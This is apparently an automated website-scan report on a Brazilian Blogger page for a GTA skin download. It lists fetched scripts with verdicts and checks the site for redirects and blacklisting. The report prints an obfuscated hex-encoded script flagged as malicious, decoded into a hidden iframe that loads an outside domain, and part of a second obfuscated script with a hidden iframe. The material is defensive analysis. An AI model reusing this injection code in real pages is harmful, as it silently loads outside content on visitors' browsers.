Scanned pages/files
Request | Server response | Status |
http://newconceptin3d.blogspot.com.br/ | 200 OK Content-Length: 98761 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: 5bwww.arriados.net ...[50102 bytes skipped]... ="400" /></a></div> <div style="text-align: center;"> <span style="font-family: inherit;"><span style="font-size: x-small;"><i><span style="color: red;">Autor</span> : RkrdM</i></span></span></div> <div style="text-align: center;"> <a href="http://www.mediafire.com/download/8uotdwa87vxi9rw/Novo+Skin+Franklin+de+GTA+V+Para+GTA+San+Andreas+%5bwww.arriados.net%5D.rar" target="_blank"><img src="http://3.bp.blogspot.com/-Ei-LHkcunS0/UKqTnXp7qGI/AAAAAAAACAw/cfmvpCwE6vI/s1600/download+concept+in+3d.png" height="128" width="128" /></a></div> <div style='clear: both;'></div> </div> <div class='post-footer'> <div class='post-footer-line post-footer-line-1'><span class='post-icons'> </span> <div class='post-share-buttons goog-inline-block'> <a cl ...[66620 bytes skipped]... | ||
http://ajax.googleapis.com/ajax/libs/jquery/1.7.0/jquery.min.js | 200 OK Content-Length: 94020 Content-Type: text/javascript | clean |
http://static.bloggerninja.com/asset/js/jquery.nivo.slider.pack.js?ver=3.2.1 | 200 OK Content-Length: 873 Content-Type: text/html | clean |
http://ak2.imgaft.com/script/jquery-1.3.1.min.js | 200 OK Content-Length: 55287 Content-Type: application/x-javascript | clean |
http://static.bloggerninja.com/test404page.js | 200 OK Content-Length: 873 Content-Type: text/html | clean |
https://apis.google.com/js/plusone.js | 200 OK Content-Length: 11629 Content-Type: application/javascript | clean |
http://www.google.com/jsapi | 200 OK Content-Length: 24546 Content-Type: text/javascript | clean |
http://connect.facebook.net/pt_BR/all.js | 200 OK Content-Length: 163340 Content-Type: application/x-javascript | clean |
http://mundoblogger.webs.com/scripts/popupFBlikebox.js | 200 OK Content-Length: 16151 Content-Type: text/javascript | clean |
http://www.fookseo.com.br/js/80x15.js | 200 OK Content-Length: 1523 Content-Type: text/javascript | clean |
https://dl.dropboxusercontent.com/s/y9jqnu8pa14ny5v/banner.js | 200 OK Content-Length: 1219 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var _0x5b42=["\x3C\x61\x20\x68\x72\x65\x66\x3D\x22\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x73\x65\x6F\x2E\x63\x72\x69\x65\x74\x69\x6F\x6E\x2E\x6E\x65\x74\x2F\x22\x20\x74\x61\x72\x67\x65\x74\x3D\x22\x5F\x62\x6C\x61\x6E\x6B\x22\x3E\x3C\x69\x6D\x67\x20\x61\x6C\x74\x3D\x22\x43\x72\x69\x65\x74\x69\x6F\x6E\x20\x53\x75\x70\x65\x72\x20\x53\x45\x4F\x20\x22\x20\x73\x72\x63\x3D\x22\x68\x74\x74\x70\x3A\x2F\x2F\x69\x2E\x69\x6D\x67\x75\x72\x2E\x63\x6F\x6D\x2F\x73\x41\x76\x31\x69\x68\x61\x2E\x70\x6E\x67\x Decoded script: <a href="http://www.seo.crietion.net/" target="_blank"><img alt="Crietion Super SEO " src="http://i.imgur.com/sAv1iha.png"></a><iframe style="display:none" src="http://www.seo.crietion.net/" width="0" height="0" frameborder="0" marginwidh="0" marginheight="0" scrolling="no"></iframe> Antivirus reports:
| ||
http://dl.dropbox.com/u/59554617/pagenavi2.js | HTTP/1.1 302 FOUND Cache-Control: no-cache Connection: close Date: Fri, 04 Apr 2014 07:15:19 GMT Pragma: no-cache Location: http://dl.dropboxusercontent.com/u/59554617/pagenavi2.js Server: nginx Content-Type: text/html; charset=utf-8 X-RequestId: d543e92c26281cda37da993860f65cbb | clean |
http://dl.dropboxusercontent.com/u/59554617/pagenavi2.js | 200 OK Content-Length: 10266 Content-Type: application/javascript | suspicious |
Suspicious code. Script contains iFrame. var _0x1728=["","\x65\x6E\x74\x72\x79","\x66\x65\x65\x64","\x73\x75\x62\x73\x74\x72\x69\x6E\x67","\x24\x74","\x70\x75\x62\x6C\x69\x73\x68\x65\x64","\x74\x69\x74\x6C\x65","\x69\x6E\x64\x65\x78\x4F\x66","\x6C\x65\x6E\x67\x74\x68","\x2F\x73\x65\x61\x72\x63\x68\x3F\x75\x70\x64\x61\x74\x65\x64\x2D\x6D\x61\x78\x3D","\x26\x6D\x61\x78\x2D\x72\x65\x73\x75\x6C\x74\x73\x3D","\x3C\x73\x70\x61\x6E\x20\x63\x6C\x61\x73\x73\x3D\x22\x73\x68\x6F\x77\x70\ ...[9902 bytes skipped]... Decoded script: <iframe id="goo" width="568" frameborder="0" marginwidth="0" height="0" marginheight="0" align="top" scrolling="no"></iframe> | ||
https://www.blogger.com/static/v1/widgets/3882746423-widgets.js | 200 OK Content-Length: 89296 Content-Type: text/javascript | clean |
http://adf.ly/js/link-converter.js | 200 OK Content-Length: 28390 Content-Type: application/x-javascript | clean |
http://dl.dropbox.com/u/52601478/Jhow.js | HTTP/1.1 302 FOUND Cache-Control: no-cache Connection: close Date: Fri, 04 Apr 2014 07:15:21 GMT Pragma: no-cache Location: http://dl.dropboxusercontent.com/u/52601478/Jhow.js Server: nginx Content-Type: text/html; charset=utf-8 X-RequestId: 2392caa80e70b813c5ea6f256bacf025 | clean |
http://dl.dropboxusercontent.com/u/52601478/jhow.js | 200 OK Content-Length: 1463 Content-Type: application/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: newconceptin3d.blogspot.com.br
Result:
HTTP/1.1 200 OK
Cache-Control: private, max-age=0
Connection: close
Date: Fri, 04 Apr 2014 07:15:13 GMT
ETag: "d45a6a82-9e3a-4710-842e-502aed30ea1c"
Server: GSE
Content-Type: text/html; charset=UTF-8
Expires: Fri, 04 Apr 2014 07:15:13 GMT
Last-Modified: Wed, 19 Mar 2014 07:26:51 GMT
Alternate-Protocol: 80:quic
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
GET / HTTP/1.1
Host: newconceptin3d.blogspot.com.br
Result:
HTTP/1.1 200 OK
Cache-Control: private, max-age=0
Connection: close
Date: Fri, 04 Apr 2014 07:15:13 GMT
ETag: "d45a6a82-9e3a-4710-842e-502aed30ea1c"
Server: GSE
Content-Type: text/html; charset=UTF-8
Expires: Fri, 04 Apr 2014 07:15:13 GMT
Last-Modified: Wed, 19 Mar 2014 07:26:51 GMT
Alternate-Protocol: 80:quic
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Second query (visit from search engine):
GET / HTTP/1.1
Host: newconceptin3d.blogspot.com.br
Referer: http://www.google.com/search?q=newconceptin3d.blogspot.com.br
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: newconceptin3d.blogspot.com.br
Referer: http://www.google.com/search?q=newconceptin3d.blogspot.com.br
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=newconceptin3d.blogspot.com.br
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://newconceptin3d.blogspot.com.br/
Result: newconceptin3d.blogspot.com.br is not infected or malware details are not published yet.
Result: newconceptin3d.blogspot.com.br is not infected or malware details are not published yet.